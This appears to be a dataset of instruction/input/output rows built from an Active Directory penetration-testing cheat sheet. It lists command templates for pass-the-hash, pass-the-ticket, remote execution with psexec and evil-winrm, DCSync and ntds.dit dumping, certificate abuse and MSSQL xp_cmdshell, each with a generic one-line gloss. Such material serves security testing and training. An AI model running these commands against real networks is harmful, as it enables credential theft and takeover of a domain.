instruction
stringclasses
270 values
input
stringlengths
3
214
output
stringclasses
297 values
Clear text Password
psexec.py <domain>/<user>:<password>@<ip>
Note or procedural step under 'Clear text Password'.
Clear text Password
psexec.exe -AcceptEULA \\<ip>
Note or procedural step under 'Clear text Password'.
Clear text Password
psexecsvc.py <domain>/<user>:<password>@<ip>
Note or procedural step under 'Clear text Password'.
Clear text Password
Pseudo-shell (file write and read)
Note or procedural step under 'Clear text Password'.
Clear text Password
atexec.py <domain>/<user>:<password>@<ip> "command"
Note or procedural step under 'Clear text Password'.
Clear text Password
smbexec.py <domain>/<user>:<password>@<ip>
Note or procedural step under 'Clear text Password'.
Clear text Password
wmiexec.py <domain>/<user>:<password>@<ip>
Note or procedural step under 'Clear text Password'.
Clear text Password
dcomexec.py <domain>/<user>:<password>@<ip>
Note or procedural step under 'Clear text Password'.
Clear text Password
nxc smb <ip_range> -u <user> -p <password> -d <domain> -x <cmd>
NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes.
Clear text Password
WinRM
Note or procedural step under 'Clear text Password'.
Clear text Password
evil-winrm -i <ip> -u <user> -p <password>
Note or procedural step under 'Clear text Password'.
Clear text Password
Enter-PSSession -ComputerName <computer> -Credential <domain>\<user>
Note or procedural step under 'Clear text Password'.
Clear text Password
nxc winrm <ip_range> -u <user> -p <password> -d <domain> -x <cmd>
NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes.
Clear text Password
RDP
Note or procedural step under 'Clear text Password'.
Clear text Password
xfreerdp /u:<user> /d:<domain> /p:<password> /v:<ip>
Note or procedural step under 'Clear text Password'.
Clear text Password
SMB
Note or procedural step under 'Clear text Password'.
Clear text Password
smbclient.py <domain>/<user>:<password>@<ip>
SMB client usage to list or access network shares.
Clear text Password
smbclient-ng.py -d <domain> -u <user> -p <password> --host <ip>
SMB client usage to list or access network shares.
Clear text Password
MSSQL
Note or procedural step under 'Clear text Password'.
Clear text Password
nxc mssql <ip_range> -u <user> -p <password>
NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes.
Clear text Password
mssqlclient.py -windows-auth <domain>/<user>:<password>@<ip>
Note or procedural step under 'Clear text Password'.
NT Hash
Pass the Hash
Note or procedural step under 'NT Hash'.
NT Hash
mimikatz "privilege::debug sekurlsa::pth /user:<user> /domain:<domain> /ntlm:<hash>"
Credential extraction or secrets dumping referenced; handle in lab and follow legal constraints.
NT Hash
RDP
Note or procedural step under 'NT Hash'.
NT Hash
reg.py <domain>/<user>@<ip> -hashes ':<hash>' add -keyName 'HKLM\System\CurrentControlSet\Control\Lsa' -v 'DisableRestrictedAdmin' -vt 'REG_DWORD' -vd '0'
Note or procedural step under 'NT Hash'.
NT Hash
WinRM
Note or procedural step under 'NT Hash'.
NT Hash
evil-winrm -i <ip> -u <user> -H <hash>
Note or procedural step under 'NT Hash'.
NT Hash
Overpass the Hash / Pass the key (PTK)
Note or procedural step under 'NT Hash'.
NT Hash
Rubeus.exe asktgt /user:victim /rc4:<rc4value>
Tool or command referenced under 'NT Hash'.
NT Hash
Rubeus.exe ptt /ticket:<ticket>
Tool or command referenced under 'NT Hash'.
NT Hash
Rubeus.exe createnetonly /program:C:\Windows\System32\[cmd.exe||upnpcont.exe]
Tool or command referenced under 'NT Hash'.
NT Hash
getTGT.py <domain>/<user> -hashes :<hashes>
Note or procedural step under 'NT Hash'.
NT Hash
getTGT.py <domain>/<user> -hashes :<hashes>
Note or procedural step under 'NT Hash'.
Kerberos
Pass the Ticket (ccache / kirbi)
Note or procedural step under 'Kerberos'.
Kerberos
Convert Format
Note or procedural step under 'Kerberos'.
Kerberos
ticketConverter.py <kirbi||ccache> <ccache||kirbi>
Note or procedural step under 'Kerberos'.
Kerberos
export KRB5CCNAME=/root/impacket-examples/domain_ticket.ccache
Note or procedural step under 'Kerberos'.
Kerberos
impacket tools: Same as Pass the hash but use : -k and -no-pass for impacket
Note or procedural step under 'Kerberos'.
Kerberos
mimikatz kerberos::ptc "<ticket>"
Credential extraction or secrets dumping referenced; handle in lab and follow legal constraints.
Kerberos
Rubeus.exe ptt /ticket:<ticket>
Tool or command referenced under 'Kerberos'.
Kerberos
proxychains secretsdump.py -k'<domain>'/'<user>'@'<ip>'
Credential extraction or secrets dumping referenced; handle in lab and follow legal constraints.
Kerberos
Modify SPN
Note or procedural step under 'Kerberos'.
Kerberos
tgssub.py -in <ticket.ccache> -out <newticket.ccache> -altservice "<service>/<target>" #pr 1256
Note or procedural step under 'Kerberos'.
Kerberos
Aeskey
Note or procedural step under 'Kerberos'.
Kerberos
impacket tools: Same as Pass the hash but use : -aesKey for impacket (and use FQDN)
Note or procedural step under 'Kerberos'.
Kerberos
proxychains secretsdump.py -aesKey <key> '<domain>'/'<user>'@'<ip>'
Credential extraction or secrets dumping referenced; handle in lab and follow legal constraints.
Socks (relay)
proxychains lookupsid.py <domain>/<user>@<ip> -no-pass -domain-sids
Note or procedural step under 'Socks (relay)'.
Socks (relay)
proxychains mssqlclient.py -windows-auth <domain>/<user>@<ip> -no-pass
Note or procedural step under 'Socks (relay)'.
Socks (relay)
proxychains secretsdump.py -no-pass '<domain>'/'<user>'@'<ip>'
Credential extraction or secrets dumping referenced; handle in lab and follow legal constraints.
Socks (relay)
proxychains smbclient.py -no-pass <user>@<ip>
SMB client usage to list or access network shares.
Socks (relay)
proxychains atexec.py -no-pass <domain>/<user>@<ip> "command"
Note or procedural step under 'Socks (relay)'.
Socks (relay)
proxychains smbexec.py -no-pass <domain>/<user>@<ip>
Note or procedural step under 'Socks (relay)'.
Certificate (pfx)
unpac the hash
Note or procedural step under 'Certificate (pfx)'.
Certificate (pfx)
certipy auth -pfx <crt_file> -dc-ip <dc_ip>
Note or procedural step under 'Certificate (pfx)'.
Certificate (pfx)
gettgtpkinit.py -cert-pfx <crt.pfx> -pfx-pass <crt_pass> "<domain>/<dc_name>" <tgt.ccache>
Note or procedural step under 'Certificate (pfx)'.
Certificate (pfx)
getnthash.py -key '<AS-REP encryption key>' '<domain>'/'<dc_name>'
Note or procedural step under 'Certificate (pfx)'.
Certificate (pfx)
Pass the certificate
Note or procedural step under 'Certificate (pfx)'.
Certificate (pfx)
pkinit
Note or procedural step under 'Certificate (pfx)'.
Certificate (pfx)
gettgtpkinit.py -cert-pfx "<pfx_file>" ^[-pfx-pass "<cert-password>"] "<fqdn_domain>/<user>" "<tgt_ccache_file>"
Note or procedural step under 'Certificate (pfx)'.
Certificate (pfx)
Rubeus.exe asktgt /user:"<username>" /certificate:"<pfx_file>" [/password:"<certificate_password>"] /domain:"<fqdn-domain>" /dc:"<dc>" /show
Tool or command referenced under 'Certificate (pfx)'.
Certificate (pfx)
certipy auth -pfx <crt_file> -dc-ip <dc_ip>
Note or procedural step under 'Certificate (pfx)'.
Certificate (pfx)
schannel
Note or procedural step under 'Certificate (pfx)'.
Certificate (pfx)
certipy auth -pfx <pfx_file> -ldap-shell
Note or procedural step under 'Certificate (pfx)'.
Certificate (pfx)
add_computer
Note or procedural step under 'Certificate (pfx)'.
Certificate (pfx)
Set RBCD
Note or procedural step under 'Certificate (pfx)'.
Certificate (pfx)
certipy cert -pfx "<pfx_file>" -nokey -out "user.crt"
Note or procedural step under 'Certificate (pfx)'.
Certificate (pfx)
certipy cert -pfx "<pfx_file>" -nocert -out "user.key"
Note or procedural step under 'Certificate (pfx)'.
Certificate (pfx)
passthecert.py -action ldap-shell -crt <user.crt> -key <user.key> -domain <domain> -dc-ip <dc_ip>
Note or procedural step under 'Certificate (pfx)'.
MSSQL
find mssql access
Note or procedural step under 'MSSQL'.
MSSQL
nxc mssql <ip> -u <user> -p <password> -d <domain>
NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes.
MSSQL
Users or Computers with SQL admin
Note or procedural step under 'MSSQL'.
MSSQL
MATCH p=(u:Base)-[:SQLAdmin]->(c:Computer) RETURN p
Note or procedural step under 'MSSQL'.
MSSQL
MSSQL
Note or procedural step under 'MSSQL'.
MSSQL
mssqlclient.py -windows-auth <domain>/<user>:<password>@<ip>
Note or procedural step under 'MSSQL'.
MSSQL
enum_db
Note or procedural step under 'MSSQL'.
MSSQL
enable_xp_cmdshell
Note or procedural step under 'MSSQL'.
MSSQL
xp_cmdshell <cmd>
Note or procedural step under 'MSSQL'.
MSSQL
enum_impersonate
Note or procedural step under 'MSSQL'.
MSSQL
exec_as_user <user>
Note or procedural step under 'MSSQL'.
MSSQL
exec_as_login <login>
Note or procedural step under 'MSSQL'.
MSSQL
xp_dir_tree <ip>
Note or procedural step under 'MSSQL'.
MSSQL
COERCE SMB
Note or procedural step under 'MSSQL'.
MSSQL
trustlink
Note or procedural step under 'MSSQL'.
MSSQL
sp_linkedservers
Note or procedural step under 'MSSQL'.
MSSQL
use_link
Note or procedural step under 'MSSQL'.
Domain Admin
Dump ntds.dit
Note or procedural step under 'Domain Admin'.
Domain Admin
nxc smb <dcip> -u <user> -p <password> -d <domain> --ntds
NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes.
Domain Admin
secretsdump.py '<domain>/<user>:<pass>'@<ip>
Credential extraction or secrets dumping referenced; handle in lab and follow legal constraints.
Domain Admin
ntdsutil "ac i ntds" "ifm" "create full c:\temp" q q
Note or procedural step under 'Domain Admin'.
Domain Admin
secretsdump.py -ntds ntds_file.dit -system SYSTEM_FILE -hashes lmhash:nthash LOCAL -outputfile ntlm-extract
Credential extraction or secrets dumping referenced; handle in lab and follow legal constraints.
Domain Admin
msf> windows/gather/credentials/domain_hashdump
Tool or command referenced under 'Domain Admin'.
Domain Admin
mimikatz lsadump::dcsync /domain:<target_domain> /user:<target_domain>\administrator
Credential extraction or secrets dumping referenced; handle in lab and follow legal constraints.
Domain Admin
certsync -u <user> -p '<password>' -d <domain> -dc-ip <dc_ip> -ns <name_server>
Note or procedural step under 'Domain Admin'.
Grab backup Keys
donpapi collect - H ':<hash>' <domain>/<user>@<ip_range> -t ALL --fetch-pvk #Credentials
Note or procedural step under 'Grab backup Keys'.
Enumeration
nltest.exe /trusted_domains
Note or procedural step under 'Enumeration'.
Enumeration
([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships()
Note or procedural step under 'Enumeration'.
Enumeration
Get-DomainTrust -Domain <domain>
Note or procedural step under 'Enumeration'.
Enumeration
Get-DomainTrustMapping
Note or procedural step under 'Enumeration'.
Enumeration
ldeep ldap -u <user> -p <password> -d <domain> -s ldap://<dc_ip> trusts
Note or procedural step under 'Enumeration'.
Enumeration
sharphound.exe -c trusts -d <domain>
Note or procedural step under 'Enumeration'.